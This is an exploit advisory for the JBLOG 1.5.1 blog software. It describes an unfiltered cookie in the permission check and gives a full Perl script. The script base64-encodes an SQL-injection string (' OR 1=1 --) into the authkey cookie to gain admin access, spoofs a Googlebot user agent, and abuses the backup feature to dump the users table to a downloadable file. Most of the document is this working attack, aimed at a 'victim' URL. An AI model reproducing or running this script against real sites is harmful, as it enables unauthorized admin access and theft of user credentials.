VENDOR JBLOG 1.5.1 (maybe earlier versions vulnerable too) http://www.lisijie.org
AUTHOR discovered & written by Ams ax330d [doggy] gmail [dot] com http://www.0x416d73.name/
VULNERABILITY DESCRIPTION Both 'index.php' and 'admin.php' includes file 'common.php' which checks for user permission on line 81 via function 'check_user()'. This function is defined in file 'include/func_user.php'. There is another one function - 'get_cookie()' which gets cookie values. So, in cookies we put our evil string and further actions should be clear.
Why we don't filter COOKIEs ?
EXPLOIT WORK This exploit uses SQL-injection to create dump of users table. Actually, we are possible to do all administrator actions.
REQUIREMENTS 1. You need to know prefix, by default it is 'jblog_'. But there is no problem to find it out. 2. Rights to write to 'cache/' folder.
use strict; use warnings;
use LWP::UserAgent; use HTTP::Request::Common; use MIME::Base64; use Getopt::Long;
Banner(); $| = 1;
my $expl_url; my $prefix = 'jblog_'; my $proxy = '';
GetOptions( 'u=s' => \$expl_url, 'pre=s' => \$prefix, 'p=s' => \$proxy, ) or Usage();
my $spider = LWP::UserAgent->new; $spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); $spider->default_header( 'Cookie' => $prefix . 'authkey=' . encode_base64( "1\t' OR 1=1 -- " ) ); $spider->proxy(['http'], "http://$proxy/") if $proxy ne ''; $spider->timeout( 30 );
Exploit( $expl_url);
sub Exploit {
$_ = shift || Usage(); print "\n\tExploiting:\t $_";
my ($prot , $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; $prot ||= 'http';
my $url = "$prot://$host$path"; my $defact = 'admin.php?ac=data&do=bakout&dosubmit=yes&sizelimit=2048';
# First request to prepare my $req = GET "$url/$defact&baktables%5B%5D=${prefix}user"; my $res = $spider->request( $req ); my ($dir, $file) = $res->content =~ /yes&bakdir=(.*?)&(?:.*?)&filepre=(.*?)'/;
# Second request to dump table $req = GET "$url/$defact&bakdir=$dir&step=1&baktablestr=${prefix}user&tableid=0&start=0&filepre=$file"; $res = $spider->request( $req );
# Finally checking if sql backup exists $req = HEAD "$url/cache/backup/$dir/${file}_1.sql"; $res = $spider->request( $req );
if ( $res->is_success ) { print "\n\tLooks ok, check $prot://$host${path}cache/backup/$dir/${file}_1.sql\n"; } else { printf( "\n\tFailure, server response: %s\n\tAnyway, check: %s\n", $res->status_line, "$prot://$host${path}cache/backup/$dir/${file}_1.sql"); } }
sub Usage {
print <<USAGE;
Usage: -u Set url of victim optional: -pre Prefix, default 'jblog_' is used if no one mentioned -p Proxy, set as ip:port
Example: $0 -u=http://site.com -pre=jblog_ -p=
exit; }
sub Banner {
print <<BANNER; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ JBLOG 1.5.1 Perl exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BANNER